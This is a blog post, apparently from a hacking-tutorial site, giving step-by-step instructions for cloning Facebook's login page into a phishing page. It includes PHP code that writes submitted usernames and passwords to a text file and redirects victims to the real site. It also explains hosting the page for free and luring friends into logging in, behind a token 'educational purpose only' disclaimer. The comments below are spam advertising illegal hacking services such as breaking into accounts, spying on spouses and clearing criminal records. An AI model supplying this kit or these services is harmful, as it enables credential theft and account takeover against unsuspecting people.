BTS' readers used to ask me how to hack Facebook accounts. Most of the people curious to know how hackers take control of their accounts. In this post, let me clarify those doubts.
Here, i am going to explain one of the popular social engineering attack(luring user to do whatever you asked to do.), called "phishing " . Phishing is one of the popular hacking technique used by hackers to lure victims into giving their login credentials.
Phishing WebPage:
Phishing webpage is a fake webpage of the target website that helps hackers to lure the victim into believe that they are visiting the legitimate website.
Let me explain how to create a facebook phishing page.
Step 1: Go to facebook and right click on website . Select "View source" and copy the code to notepad.
Step2: Now search (Press ctrl +f) for keyword "action" in that code. You fill find the code like this:
Here, let me explain what "action" means to. If you have some basic knowledge of web applications, then you already know about that. 'Action' is a HTML attribute that specifies where to send the form-data when a form is submitted.
In the above code, the action attribute has the value that points to facebook login php file (https://login.facebook.com/login.php). So when a user click the login button, it will send the data to the login.php page. This php file will check whether the entered password is valid or not .
To capture the form-data, we have to change the action value to our php file. So let us change the value to ' action="login.php" '.
Note: I've removed ' http://login.facebook.com/' from the value.
Save the file as index.html.
Step 3:
Now , let us create our own login.php file that will capture the entered data and redirects to original facebook page.
Open the notepad and type the following code:
< ?php header ("Location: http://www.Facebook.com/ login.php ") ; $handle = fopen("pswrds.txt", "a"); foreach($_ POST as $variable => $value)
{ fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n"); }
fwrite($handle, "\r\n");
fclose($handle);
exit; ?>
save this file as "login.php" Step
4: Open the notepad and just save the file as "pswrds.txt" (without any contents).
Step 5: To host your phishing page, you may need a webhosting. You can create a free account in free web hosting providers. Once you have created account in free hosting site, you can host your files and run.
Also, your files can be viewed by visiting a specific URL provided when you create account. For example : 'your_url_ name.webhosting_domain.com'.
Now upload those files (index.html,login.php,pswrds.txt) in the free Web hosting site.
Make sure your fake page is working or not by vising your url. Now , You have to lure your friends into login into your phishing page. Once they login into the page, you can see the login credentials being stored in the "pswrds.txt" file.
Note: The above article is for educational purpose only, written for beginners of Ethical hacking to understand the basics.
Here is tips to prevent from Phishing Web page:
How to prevent from Phishing Web page?
Hack facebook password in 5 seconds..www.onlinefacebookhacking.com
ReplyDeleteHack facebook password in 5 seconds..www.onlinefacebookhacking.com
ReplyDeletenowday,facebook already block all website with contain phising.
ReplyDeleteThis comment has been removed by the author.
ReplyDeleteGain access to any Facebook account using Cyberian hacking program.
ReplyDeleteMake a request at cyberian414@outlook.com
Do you need to increase your credit score?
ReplyDeleteDo you intend to upgrade your school grade?
Do you want to hack your cheating spouse Email, whatsapp, Facebook, instagram or any social network?
Do you need any information concerning any database.
Do you need to retrieve deleted files?
Do you need to clear your criminal records or DMV?
Do you want to remove any site or link from any blog?
you should contact this hacker, he is reliable and good at the hack jobs..
contact : cybergoldenhacker at gmail dot com